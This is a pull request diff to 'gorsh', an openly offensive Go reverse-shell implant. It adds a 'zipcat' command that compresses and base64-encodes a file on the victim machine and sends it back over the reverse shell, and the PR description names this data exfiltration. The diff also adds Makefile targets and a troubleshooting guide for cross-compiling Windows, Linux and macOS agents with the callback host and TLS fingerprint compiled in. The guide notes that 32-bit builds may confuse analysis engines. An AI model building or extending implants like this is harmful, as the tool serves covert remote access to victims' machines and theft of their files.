### PR TITLE
add zipcat data exfiltration

### DIFF
--- a/DEVELOPING
+++ b/DEVELOPING
@@ -1,0 +1,114 @@
+# Developers Notes: understanding issues related to building (USER CAN IGNORE THIS)
+
+## Build problems
+
+#### Not enabling CGO
+
+If you are experiencing build problems, specifically this error:
+
+```
+# github.com/valyala/gozstd
+../src/github.com/valyala/gozstd/stream.go:31:59: undefined: CDict
+../src/github.com/valyala/gozstd/stream.go:35:64: undefined: CDict
+../src/github.com/valyala/gozstd/stream.go:47:20: undefined: Writer
+```
+
+or
+
+```
+# github.com/valyala/gozstd
+../src/github.com/valyala/gozstd/stream.go:31:59: undefined: CDict
+../src/github.com/valyala/gozstd/stream.go:35:64: undefined: CDict
+../src/github.com/valyala/gozstd/stream.go:47:20: undefined: Writer
+```
+
+The reason is because you need CGO_ENABLED=1 before your command. Simple fix.
+
+#### 32/64 issue when compiling on native architecture for two word register sizes
+
+If you are seeing the following:
+
+```
+# github.com/valyala/gozstd
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(zstd_common.o)' is incompatible with i386 output
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(zstd_compress.o)' is incompatible with i386 output
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(zstd_double_fast.o)' is incompatible with i386 output
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(zstd_fast.o)' is incompatible with i386 output
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(zstd_lazy.o)' is incompatible with i386 output
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(zstd_ldm.o)' is incompatible with i386 output
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(zstd_opt.o)' is incompatible with i386 output
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(zstd_decompress.o)' is incompatible with i386 output
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(zdict.o)' is incompatible with i386 output
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(entropy_common.o)' is incompatible with i386 output
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(error_private.o)' is incompatible with i386 output
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(fse_decompress.o)' is incompatible with i386 output
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(xxhash.o)' is incompatible with i386 output
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(fse_compress.o)' is incompatible with i386 output
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(hist.o)' is incompatible with i386 output
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(huf_compress.o)' is incompatible with i386 output
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(huf_decompress.o)' is incompatible with i386 output
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(cover.o)' is incompatible with i386 output
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(divsufsort.o)' is incompatible with i386 output
+/usr/bin/ld: i386:x86-64 architecture of input file `/home/debian/goprojects/src/github.com/valyala/gozstd/libzstd_linux.a(pool.o)' is incompatible with i386 output
+collect2: error: ld returned 1 exit status
+Makefile:43: recipe for target 'linux32' failed
+make: *** [linux32] Error 2
+```
+
+This is a result of installing a golang module that previously built a static library from native code using a different GOARCH but same GOOS. THe solution is
+to run `go clean -i github.com/valyala/gozstd/` to remove it. This dependency should be removed and retrieved again with GOOARC and GOOS set, otherwise
+it will continuously be incompatible with the host. Unfortunately, this doesn't seem to work very well. See the TODO section at the bootom.
+
+#### Not setting CC to the correct mingw compiler for your system
+
+If you are seeing this, specifically for the Windows target(s):
+
+```
+$ make windows64
+CGO_ENABLED=1 GOOS=windows GOARCH=amd64 go build --ldflags "-w -X main.connectString=: -X main.fingerPrint=$(openssl x509 -fingerprint -sha256 -noout -in local/server.pem | cut -d '=' -f2) -H=windowsgui" -o binaries/windows/gorsh64.exe gorsh.go
+# runtime/cgo
+gcc: error: unrecognized command line option ‘-mthreads’; did you mean ‘-pthread’?
+Makefile:43: recipe for target 'windows64' failed
+make: *** [windows64] Error 2
+```
+
+The solution is to set CC in your environment to the correct mingw 64bit-64bit gcc-posix compiler. For example, on a native 64-bit system running Debian:
+
+ `export CC=/usr/bin/x86_64-w64-mingw32-gcc-6.3-posix`
+
+ After this, `make windows64` should work just fine
+
+
+### Issue #1 - Ensuring appropriate mingw compilers are available on your system
+
+DEBIAN: `sudo apt-get install -y gcc-mingw-w64 g++-mingw-w64 binutils-mingw-w64-x86-64` REDHAT:
+`sudo yum install mingw64-gcc mingw64-g+++ mingw64-binutils` ARCH: 	`sudo packman -S
+mingw-w64-gcc mingw-w64-g++ mingw-w64-binutils`
+
+### Issue #2 - Multilib builds of GCC are problematic when building on native host
+
+You will notice that on a system with a multilib-enabled toolchain, `make linux64 && make linux32`
+will succeed on the first make but fail on the second make, unless the GOOS is different. This is
+because a library requiring native-c compilating was built using the hosts native architecture, and
+`go get` and/or `go build` did not respect `GOARCH=386`
+
+This is not a huge problem, but it is an annoyance when having to build packages often.
+
+Aside from not running a multilib-capable compiler on your system (this doesn't mean necessarily
+you won't have a muultilib system), the solution may be to maintain a pair of dedicated
+(non-multilib) compilers, and ensure that the `go get` or `go build` process uses those.
+Alternately, look into how one can pass CFLAGS during `go get` or `go build` of an external
+package. 
+
+While maintaining toolchains sounds like an awful lot of work, it isn't terrible if you utilize
+https://githug.com/richfelker/musl-cross-make and some pre-built toolchain config.mak files for
+forcing 32 bit builds on 64 bit hosts. Placing [this
+activate](https://github.com/mzpqnxow/gdb-static-cross/blob/44bddbd2f1fe3bdc41d401d754202aab67e7c3f4/activate-script-helpers/activate-musl-toolchain.env)
+file in the root of each resulting musl toolchain and sourcing it before building for the 32-bit
+architecture should more or less solve the problem. When building the i386 toolchain, ensure that
+the config.mak is not enabled for multilib! An example config.mak is available [here](
+
+An issue and/or PR will be soon to follow if there is interest in fixing this "hidden" problem. It
+may be very rare in practice that *any* 32-bit binaries for *any* architecture are required. On the
+other hand, a 32-bit executable might throw off some analysis engines attempting to identify the
+project while deplpoyed/in-use.

--- a/Makefile
+++ b/Makefile
@@ -16,32 +16,38 @@ STRIP=-s
 LINUX_LDFLAGS=--ldflags "${STRIP} -w -X main.connectString=${LHOST}:${LPORT} -X main.fingerPrint=${FINGERPRINT}"
 WIN_LDFLAGS=--ldflags "${STRIP} -w -X main.connectString=${LHOST}:${LPORT} -X main.fingerPrint=${FINGERPRINT} -H windowsgui"
 
+MINGW=x86_64-w64-mingw32-gcc-7.3-posix
+
 all: linux64 windows64 macos64 linux32 macos32 windows32 
 
 depends:
-	openssl req -subj '/CN=sysdream.com/O=Sysdream/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout ${SRV_KEY} -out ${SRV_PEM}
+	openssl req -subj '/CN=localhost/O=Localhost/C=US' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout ${SRV_KEY} -out ${SRV_PEM}
 	cat ${SRV_KEY} >> ${SRV_PEM}
 
 listen:
 	KEY=${SRV_KEY} PEM=${SRV_PEM} LISTEN=scripts/listen.sh scripts/start.sh
 
-linux32:
-	GOOS=linux GOARCH=386 ${BUILD} ${LINUX_LDFLAGS} -o ${OUT_LINUX}32 ${SRC}
-
 linux64:
 	GOOS=linux GOARCH=amd64 ${BUILD} ${LINUX_LDFLAGS} -o ${OUT_LINUX}64 ${SRC}
+
+windows64:
+	CC=${MINGW} \
+	CGO_ENABLED=1 GOOS=windows GOARCH=amd64 ${BUILD} ${WIN_LDFLAGS} -o ${OUT_WINDOWS}64.exe ${SRC}
+
+macos64:
+	@echo "macOS amd64 currently broken. Fix in progress"
+	GOOS=darwin GOARCH=amd64 ${BUILD} ${LINUX_LDFLAGS} -o ${OUT_MACOS}64 ${SRC}
+
+linux32:
+	GOOS=linux GOARCH=386 ${BUILD} ${LINUX_LDFLAGS} -o ${OUT_LINUX}32 ${SRC}
 
 windows32:
 	GOOS=windows GOARCH=386 ${BUILD} ${WIN_LDFLAGS} -o ${OUT_WINDOWS}32.exe ${SRC}
 
-windows64:
-	CGO_ENABLED=1 GOOS=windows GOARCH=amd64 ${BUILD} ${WIN_LDFLAGS} -o ${OUT_WINDOWS}64.exe ${SRC}
-
 macos32:
 	GOOS=darwin GOARCH=386 ${BUILD} ${LINUX_LDFLAGS} -o ${OUT_MACOS}32 ${SRC}
 
-macos64:
-	GOOS=darwin GOARCH=amd64 ${BUILD} ${LINUX_LDFLAGS} -o ${OUT_MACOS}64 ${SRC}
-
 clean:
 	rm -rf ${SRV_KEY} ${SRV_PEM} ${OUT_LINUX} ${OUT_WINDOWS} ${OUT_MACOS}
+
+.PHONY: linux64 windows64 macos64 linux32 macos32 windows32 clean listen

--- a/README.md
+++ b/README.md
@@ -17,13 +17,21 @@ Learn about host-based OPSEC considerations when writing an implant.
 Changes after fork:
 
 * Uses tmux as a pseudo-C2-like interface, creating a new window with each agent callback
-* Download files with HTTP on all platform
-* Download files with SMB on all windows
+* zipcat: zip > base64 > cat for data small/medium data exfil (zstd/x64 or gzip/x86)
+* Download files to victim with HTTP on all platform
+* Download files to victim with SMB on all windows
 * Situational Awareness output on new shells
 * Removed Meterpreter functionality
 * Removed Shellcode execution
 * Remove the use of passing power/shell commands at the gorsh prompt
 * Add common file operation commands that use go instead of power/shell
+
+__NOTICE__: Requires go 1.11.
+Also, the zStandard compression library in this project uses `cgo` and thus you'll need the mingw
+compiler on Linux if you want to compile the Windows agents. It also only supports GOARCH=amd64, so
+32-bit agent use a less efficient gzip algo. 
+
+And so does the darwin64 until I can figure out a sane way to compile.
 
 Roadmap:
 
@@ -32,9 +40,20 @@ Roadmap:
 - [ ] Recon module for analyzing things like tasks, services, and host-based protections
 - [ ] Dotnet integration so `shell` drops into a Runspace with System.Management.Automation. 
       Bacially PowerShell without PowerShell.
+- [ ] Fix CGO compilation for macos64 so it uses zstd for compression instead of gzip
 
 
 ## Getting started
+
+Because this project uses `cgo` and tries to cross-compile for linux/windows/macos, you'll need a
+windows compiler. I've only tried this on Debian, but since go1.11, you just need mingw installed.
+
+```sh
+apt get install gcc-mingw-w64 binutils-mingw-w64-x86-64
+```
+That's it as far cross-compiling to Windows64 goes. While it is often require during
+cross-compilation to set variables like $CC, $CXX, $AS, $LD, ... it is not required as go1.11
+linux/amd64 picks up on the presence of the toolchain it needs.
 
 Make sure to read the Makefile. It gives you a good idea of what's going on.
 
@@ -67,6 +86,9 @@ $ make {windows,macos,linux}{32,64} LHOST=example.com LPORT=443
 #or
 $ make all LHOST=example.com LPOST=443
 ```
+
+[Troubleshooting](./DEVELOPING)
+
 
 ## Catching the shell
 
@@ -101,3 +123,4 @@ Type `help` to show what commands are supported.
 
 * Initial Work - Ronan Kervella `<r.kervella -at- sysdream -dot- com>`
 * Modifications - f47h3r - [@f47h3r_b0](https://twitter.com/f47h3r_b0)
+* mzpqnxow for figuring out my x-compilation and dependancy problems and troubleshooting guide

--- a/cmd/gorsh/main.go
+++ b/cmd/gorsh/main.go
@@ -19,6 +19,7 @@ import (
 	"github.com/audibleblink/gorsh/internal/fetch"
 	"github.com/audibleblink/gorsh/internal/shell"
 	"github.com/audibleblink/gorsh/internal/sitrep"
+	"github.com/audibleblink/gorsh/internal/zip"
 )
 
 const (
@@ -174,6 +175,19 @@ func InteractiveShell(conn net.Conn) {
 				net := sitrep.All()
 				Send(conn, net)
 
+			case "zipcat":
+				if len(argv) != 2 {
+					Send(conn, "Usage: zipcat <file>")
+				} else {
+					bytes, err := zip.Bytes(argv[1])
+					if err != nil {
+						Send(conn, err.Error())
+					} else {
+						b64 := base64.StdEncoding.EncodeToString(bytes)
+						Send(conn, b64)
+					}
+				}
+
 			case "help":
 				Send(conn, "Currently implemented commands: \n"+
 					"cd [path]          -  Change the process' working directory\n"+
@@ -181,6 +195,7 @@ func InteractiveShell(conn net.Conn) {
 					"pwd                -  Print the current working directory\n"+
 					"ps                 -  Print process information\n"+
 					"cat <file>         -  Print the contents of the given file\n"+
+					"zipcat <file>      -  Compress, base64, and print the given file\n"+
 					"base64 <file>      -  Base64 encode the given file and print\n"+
 					"fetch <URI> <file> -  Fetch stuff. http[s]:// or //share/folder (Windows only)\n"+
 					"shell              -  Drops into a native shell. Mind your OPSEC\n"+

--- a/internal/zip/zip.go
+++ b/internal/zip/zip.go
@@ -1,0 +1,24 @@
+// +build 386 darwin,amd64
+
+package zip
+
+import (
+	"bytes"
+	"compress/gzip"
+	"io/ioutil"
+)
+
+func Bytes(path string) ([]byte, error) {
+	var zipData bytes.Buffer
+	file, err := ioutil.ReadFile(path)
+	if err != nil {
+		bytes := zipData.Bytes()
+		return bytes, err
+	}
+
+	zipper := gzip.NewWriter(&zipData)
+	zipper.Write(file)
+	zipper.Close()
+	bytes := zipData.Bytes()
+	return bytes, err
+}

--- a/internal/zip/zip64.go
+++ b/internal/zip/zip64.go
@@ -1,0 +1,18 @@
+// +build linux,amd64 windows,amd64
+
+package zip
+
+import (
+	"github.com/valyala/gozstd"
+	"io/ioutil"
+)
+
+func Bytes(path string) ([]byte, error) {
+	file, err := ioutil.ReadFile(path)
+	if err != nil {
+		return file, err
+	}
+
+	zipData := gozstd.CompressLevel(nil, file, 15)
+	return zipData, err
+}


### PR DESCRIPTION
zipcat allows for data exfiltration over the established reverse shell by compressing a file and base64ing it and printing it on the screen. The operator can then copy the output with a few tmux commands and 

```sh
xclip -out -selection clipboard | base64 -d | zstd -d - -o $file
```
The zstd library only works on x86_64 linux and windows. macos64 and all 32 bit builds use gzip.